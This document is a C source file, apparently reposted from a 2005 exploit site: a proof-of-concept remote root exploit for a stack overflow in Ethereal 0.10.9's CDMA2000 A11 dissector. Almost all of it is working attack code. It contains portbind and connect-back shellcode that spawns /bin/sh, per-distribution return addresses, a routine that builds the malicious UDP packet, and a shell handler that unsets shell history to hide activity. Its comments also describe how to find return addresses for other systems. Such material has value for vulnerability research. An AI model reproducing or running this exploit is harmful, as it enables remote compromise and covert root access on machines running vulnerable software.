exploits , vulnerabilities , articles , Ethereal CDMA2000 A11 Dissector Remote Root Exploit

/*
* Ethereal 0.10.9 and below proof-of-concept remote root exploit
* (c) 2005 Diego Giagio <dgiagio irion com br>
*
* The CDMA2000 A11 protocol dissector (packet-3g-a11.c) has a stack
overflow
* vulnerability when decoding Airlink records. This vulnerability was
also
* discovered by Diego Giagio on 01/March/2005. The vendor was imediatelly
* contacted.
*
*
* Notes:
*
* This program has only been tested on Linux.
*
* If your system isn't on the target list and you are running Linux (x86),
you
* can easily find your system's ret address. See below:
*
* First you need to force Ethereal dump a core file.
* bash$ ./ethereal-g3-a11 -a 0xdeadbeef -s 1 -d <your_machine_ip> -p
65535
*
* Then, use the script below to find the ret address from the core file:
* --snip--
* #!/bin/sh
*
* ADDR=`objdump -D -s core | * grep "90909090 90909090 90909090
90909090" | * head
-2 | tail -1 | awk '{print 0x$1}'`
* echo "Address: 0x$ADDR"
* --snip--
*
* Use that address with the -a <address> option. Good luck.
*
*
* Greets:
*
* ttaranto, eniac, rogbas, pjoppert, skylazart, cync, runixd,
* surfer, setnf, cbc, SUiCiDE, _hide, Codak, dm_, nuTshell
*
* #buffer ircs ircsnet net
*
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>

/*
* portbind, execve /bin/sh linux shellcode by BreeZe <breeze binbash
org>
*/
char sc_portbind[] =
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d\x08"
"\xb0\x66\xcd\x80\x89\x45\x08\x43\x89\x5d\x14\x66\xc7\x45\x16\xff\xff\x31"
"\xc0\x89\x45\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80"
"\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c\x89\x45\x10\xb0"
"\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0"
"\x3f\xcd\x80\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68\x54\x52\x4f\x45\x50\x4a\x55\x48\x53";

/*
* connectback, execve /bin/sh linux shellcode by BreeZe <breeze binbash
org>
* slighty modified by Diego Giagio <dgiagio irion com br>
*/
char sc_connectback[] = 
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d\x08"
"\xb0\x66\xcd\x80\x89\x45\x08\x43\x89\x5d\x14\x43\x66\xc7\x45\x16\xff\xff"
"\xc7\x45\x18\xc6\x51\x81\x64\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10\xb0"
"\x66\xcd\x80\x8b\x5d\x08\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41"
"\xb0\x3f\xcd\x80\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x54\x52\x4f\x45\x50\x4a\x55\x48\x53";


typedef enum
{
SC_NULL = -1,
SC_PORTBIND = 1,
SC_CONNECTBACK = 2
} shellcode_type_t;

struct shellcode_t
{
int id;

shellcode_type_t type;

char *desc;
char *data;

int host_offset;
int port_offset;
};

struct shellcode_t shellcode_list[] =
{
{1, SC_PORTBIND, "portbind", sc_portbind, -1, 33},
{2, SC_CONNECTBACK, "connectback", sc_connectback, 39, 34},
{-1, SC_NULL, NULL, NULL, -1, -1}
};

struct target_t
{
int id;
char *desc;
long addr;
};

struct target_t target_list[] =
{
{1, "Slackware 10.1 - ethereal 0.10.9 from source",
0x0812d110},
{2, "Slackware 10.1 - tethereal 0.10.9 from source",
0x081f30d0},
{3, "Fedora Core 3 - ethereal 0.10.9 from rpm", 0x08117a80},
{4, "Fedora Core 3 - tethereal 0.10.9 from rpm", 0x08690ac0},
{4, "Gentoo 2004.3 - tethereal 0.10.9 from portage",
0x081c3d90},
{-1, NULL, -1}
};

#define PROTO_3G_A11_PORT 699

char proto_3g_a11_begin[] =
"\x01" // a11 message type - registration request
"\x0a" // flags
"\xff\xff" // lifetime 0000 to ffff
"\x00\x00\x00\x00" // home address
"\xf0\x00\xba\x00" // home agent addr - any addr
"\x00\x00\x00\x00" // care of addr - any addr
"\xde\xad\xbe\xef\xd0\x00\x00\x0d" // identification
"\x26" // ext type - CVSE_EXT
"\x00" // nada
"\xff\xff" // ext len
"\x00\x00\x00\x00" // vse vid
"\x01\x01" // vse apptype 0x0101
;

char proto_3g_a11_before_shellcode[] =
"\x1a" // radius vendor specific
"\xff" // len
;

char proto_3g_a11_before_retaddrs[] =
"\x1f" // radius ad-hoc
"\xfe" // len
;

static int
find_shellcode_by_id (int id, struct shellcode_t **sc)
{
int i;

for (i=0; shellcode_list[i].id != -1; i++)
{
if (shellcode_list[i].id == id)
{
*sc = &shellcode_list[i];
return 0;
}
}

return -1;
}

static int
find_target_by_id (int id, struct target_t **target)
{
int i;

for (i=0; target_list[i].id != -1; i++)
{
if (target_list[i].id == id)
{
*target = &target_list[i];
return 0;
}
}

return -1;
}

int
parse_ip (const char *ipstr, long *ip)
{
int a, b, c, d;

if (sscanf (ipstr, "%d.%d.%d.%d", &a, &b, &c, &d) != 4)
return -1;

*ip = (d & 0x000000ff);
*ip |= (c & 0x000000ff) << 8;
*ip |= (b & 0x000000ff) << 16;
*ip |= (a & 0x000000ff) << 24;

return 0;
}

static int
sock_create (int type, int proto)
{
struct linger l;
int sock;
int sockopt;
int ret;

sock = socket (type, proto, 0);
if (sock < 0)
return -1;

l.l_onoff = 1;
l.l_linger = 0;
ret = setsockopt (sock, SOL_SOCKET, SO_LINGER, &l, sizeof (l));
if (ret < 0)
{
close (sock);
return -2;
}

sockopt = 1;
ret = setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &sockopt,
sizeof (sockopt));
if (ret < 0)
{
close (sock);
return -3;
}

return sock;
}

static int
sock_udp_create (void)
{
return sock_create (AF_INET, SOCK_DGRAM);
}

static int
sock_tcp_create (void)
{
return sock_create (AF_INET, SOCK_STREAM);
}

static int
sock_connect (int sock, long host, int port)
{
struct sockaddr_in addr;

memset (&addr, 0, sizeof (addr));
addr.sin_family = AF_INET;
addr.sin_port = htons (port);
addr.sin_addr.s_addr = htonl (host);

if (connect (sock, (struct sockaddr *)&addr, sizeof (addr)) < 0)
return -1;

return sock;
}

static int
sock_bind (int sock, long host, int port)
{
struct sockaddr_in addr;

memset (&addr, 0, sizeof (addr));
addr.sin_family = AF_INET;
addr.sin_port = htons (port);
addr.sin_addr.s_addr = htonl (host);

if (bind (sock, (struct sockaddr *)&addr, sizeof (addr)) < 0)
return -1;

if (listen (sock, 1) < 0)
return -1;
}

static int
sock_accept (int sock)
{
fd_set fds;
struct sockaddr_in addr;
struct timeval tv;
int new_sock;
int ret;

FD_ZERO (&fds);
FD_SET (sock, &fds);

tv.tv_sec = 10;
tv.tv_usec = 0;

ret = select (sock + 1, &fds, NULL, NULL, &tv);
if (ret < 0)
return -1;

if (ret == 0)
{
errno = ETIMEDOUT;
return -1;
}

if (FD_ISSET (sock, &fds))
{
int i = sizeof (addr);

new_sock = accept (sock, (struct sockaddr *)&addr, &i);
if (new_sock < 0)
return -1;

return new_sock;
}

return -1;
}

static void
sock_disconnect (int sock)
{
close (sock);
}

static int
sock_send_payload (long dest, int port, char *packet, int packet_len)
{
int sock;

/* create udp socket */
sock = sock_udp_create ();
if (sock_connect (sock, dest, PROTO_3G_A11_PORT) < 0)
return -1;

/* send packet */
send (sock, packet, packet_len, 0);

printf ("[-] UDP packet sent (%d bytes).\n", packet_len);
fflush (stdout);

/* disconnect socket */
sock_disconnect (sock);

return 0;
}

static void
shell (int sock)
{
fd_set fds;
char *cmd = "unset HISTFILE; /bin/uname -a; /usr/bin/id\n";
char buf [2048];
int n;

printf ("[-] Enjoy your shell\n");
printf ("\n");


send (sock, cmd, strlen (cmd), 0);

while (1)
{
FD_ZERO (&fds);
FD_SET (sock, &fds); /* socket */
FD_SET (0, &fds); /* stdin */

if (select (sock + 1, &fds, NULL, NULL, NULL) < 0)
break;

if (FD_ISSET (sock, &fds))
{
if ((n = recv (sock, buf, sizeof (buf), 0)) < 0)
{
perror ("[-] shell(): error reading from socket: recv()");
return;
}

if (n == 0)
break;

if ((write (1, buf, n)) < 0)
{
perror ("[-] shell(): error writing to stdout: write()");
return;
}
}

if (FD_ISSET (0, &fds))
{
if ((n = read (0, buf, sizeof (buf))) < 0)
{
perror ("[-] shell(): error reading from stdin: read()");
return;
}

if ((send (sock, buf, n, 0)) < 0)
{
perror ("[-] shell(): error writing to socket: send()");
return;
}

if (n == 0)
break;
}
}

printf ("[-] Connection closed.\n");
}

static void
shell_portbind (long dest, int port, char *packet, int packet_len)
{
int sock;


if (sock_send_payload (dest, port, packet, packet_len) < 0)
{
perror ("[-] Unable to send payload");
return;
}

sock = sock_tcp_create ();
if (sock < 0)
{
perror ("[-] Error creating socket");
return;
}

printf ("[-] Delaying 3 seconds before connection attempt
(portbind).");
fflush (stdout);
sleep (1);
printf (".");
fflush (stdout);
sleep (1);
printf (".");
fflush (stdout);
sleep (1);
printf ("\n");

if (sock_connect (sock, dest, port) < 0)
{
perror ("[-] Unable to connect");
return;
}

shell (sock);
sock_disconnect (sock);
}

static void
shell_connectback (long host, int port, long dest,
char *packet, int packet_len)
{
int sock;
int new_sock;

sock = sock_tcp_create ();
if (sock < 0)
{
perror ("[-] Error creating socket");
return;
}

/* we bind before sending the payload to avoid not being
* listening when the connectback shellcode tries to connect
*/
if (sock_bind (sock, host, port) < 0)
{
perror ("[-] Unable to bind/listen");
return;
}

if (sock_send_payload (dest, port, packet, packet_len) < 0)
{
perror ("[-] Unable to send payload");
return;
}

printf ("[-] Waiting 10s for incoming connection
(connectback)...\n");
fflush (stdout);

new_sock = sock_accept (sock);
if (new_sock < 0)
{
perror ("[-] Unable to accept connection");
return;
}

sock_disconnect (sock);

shell (new_sock);
sock_disconnect (new_sock);
}

static void
prog_info (void)
{
printf ("Ethereal 0.10.9 and below proof-of-concept remote
exploit.\n");
printf ("(c) 2005 Diego Giagio <dgiagio irion com
br>\n");
printf ("\n");
}

static void
usage (const char *prog)
{
int i;

prog_info ();

printf ("Usage:\n");
printf (" [-] %s -t <target> -s <shellcode> -d <dest
ip> "
"-h <host> -p <port>\n"
" [-] %s -a <addr> -s <shellcode> -d <dest ip>
"
"-h <host> -p <port>\n", prog, prog);

printf ("\n");

printf ("Target:\n");
for (i=0; target_list[i].id != -1; i++)
{
printf (" [-] %d. %s, addr: 0x%x\n",
target_list[i].id, target_list[i].desc, target_list[i].addr);
}

printf ("\n");

printf ("Shellcode:\n");
for (i=0; shellcode_list[i].id != -1; i++)
{
printf (" [-] %d. %s\n",
shellcode_list[i].id,
shellcode_list[i].desc);
}

printf ("\n");

printf ("Info:\n");
printf (" [-] 1. When using connectback shellcode, you must
specify\n");
printf (" [-] the host to receive the connection (-h).\n");
printf ("\n");
printf (" [-] 2. When using portbind shellcode, the option (-h) will
\n");
printf (" [-] have no effect.\n"); 

printf ("\n");
}

int
main (int argc, char *argv[])
{
struct target_t *target = NULL;
struct shellcode_t *shellcode = NULL;
int shellcode_len;

long dest = 0;
long host = 0;
int port = 0;
long addr = 0;

int opt;
int opt_err = 0;
int i;

char *ptr_pkt;
char pkt[1500];
int pkt_len;

while ((opt = getopt (argc, argv, "t:s:d:h:p:a:")) != EOF) 
{
switch (opt)
{

case 't': /* target id */
if (find_target_by_id (atoi (optarg), &target) < 0)
{
printf ("Not a valid target id.\n");
opt_err ++;
}
break;

case 's': /* shellcode id */
if (find_shellcode_by_id (atoi (optarg), &shellcode) < 0)
{
printf ("Not a valid shellcode id.\n");
opt_err ++;
}
break;

case 'd': /* destination */
if (parse_ip (optarg, &dest) < 0)
{
printf ("Invalid address for destination.\n");
opt_err ++;
}
break;

case 'h': /* host for connectback */
if (parse_ip (optarg, &host) < 0)
{
printf ("Invalid address for host.\n");
opt_err ++;
}

break;

case 'p': /* port for connectback or portbind */
port = atoi (optarg);
if (port < 0 || port > 65535)
{
printf ("Invalid port.\n");
opt_err ++;
}

break;

case 'a': /* ret address */
if (sscanf (optarg, "0x%x", &addr) != 1)
{
printf ("Invalid address.\n");
opt_err ++;
}
break;

case '?':
default:
usage (argv[0]);
opt_err ++;
break;
}
}

if (opt_err != 0)
return -1;

if (argc < 2)
{
usage (argv[0]);
return 0;
}

if (target == NULL && addr == 0)
{
printf ("Please choose either a target (-t) or an address
(-a).\n");
return -1;
}

if (target != NULL && addr != 0)
{
printf ("Target (-t) and address (-a) cannot be used
together.\n");
return -1;
}

addr = target != NULL ? target->addr : addr;

if (shellcode == NULL)
{
printf ("Please choose a shellcode (-s).\n");
return -1;
}

shellcode_len = strlen (shellcode->data);

if (dest == 0)
{
printf ("Please choose a destination (-d).\n");
return -1;
}

if (shellcode->host_offset != -1)
{
char *ptr;

if (host == 0)
{
printf ("Please choose a host (-h).\n");
return -1;
}

ptr = shellcode->data + shellcode->host_offset;
*(ptr++) = (host & 0xff000000) >> 24;
*(ptr++) = (host & 0x00ff0000) >> 16;
*(ptr++) = (host & 0x0000ff00) >> 8;
*(ptr++) = (host & 0x000000ff);
}

if (shellcode->port_offset != -1)
{
char *ptr;

if (port == 0)
{
printf ("Please choose a port (-p).\n");
return -1;
}

ptr = shellcode->data + shellcode->port_offset;
*(ptr++) = (port & 0xff00) >> 8;
*(ptr++) = (port & 0x00ff);
}


/* copyright */
prog_info ();

/* some info */
printf ("[-] Using addr 0x%x\n", addr);
fflush (stdout);

/* build packet */
ptr_pkt = pkt;

memcpy (ptr_pkt, proto_3g_a11_begin,
sizeof (proto_3g_a11_begin));
ptr_pkt += sizeof (proto_3g_a11_begin) - 1;

memcpy (ptr_pkt, proto_3g_a11_before_shellcode,
sizeof (proto_3g_a11_before_shellcode));
ptr_pkt += sizeof (proto_3g_a11_before_shellcode) - 1;

/* shellcode */
memset (ptr_pkt, 0x90, 255);
ptr_pkt += 255 - shellcode_len - 2;
memcpy (ptr_pkt, shellcode->data, shellcode_len);
ptr_pkt += shellcode_len;

memcpy (ptr_pkt, proto_3g_a11_before_retaddrs,
sizeof (proto_3g_a11_before_retaddrs));
ptr_pkt += sizeof (proto_3g_a11_before_retaddrs) - 1;

/* addrs */
for (i=0; i<254; i+=4)
{
ptr_pkt[i] = (addr & 0x000000ff);
ptr_pkt[i+1] = (addr & 0x0000ff00) >> 8;
ptr_pkt[i+2] = (addr & 0x00ff0000) >> 16;
ptr_pkt[i+3] = (addr & 0xff000000) >> 24;
}
ptr_pkt += 254;

/* calc packet len */
pkt_len = ptr_pkt - pkt;


switch (shellcode->type)
{
case SC_PORTBIND:
shell_portbind (dest, port, pkt, pkt_len);
break;
case SC_CONNECTBACK:
shell_connectback (host, port, dest, pkt, pkt_len);
break;
default:
/* NOT REACHED */
break;
}

return 0;
}
securitydot.net - 2005-03-14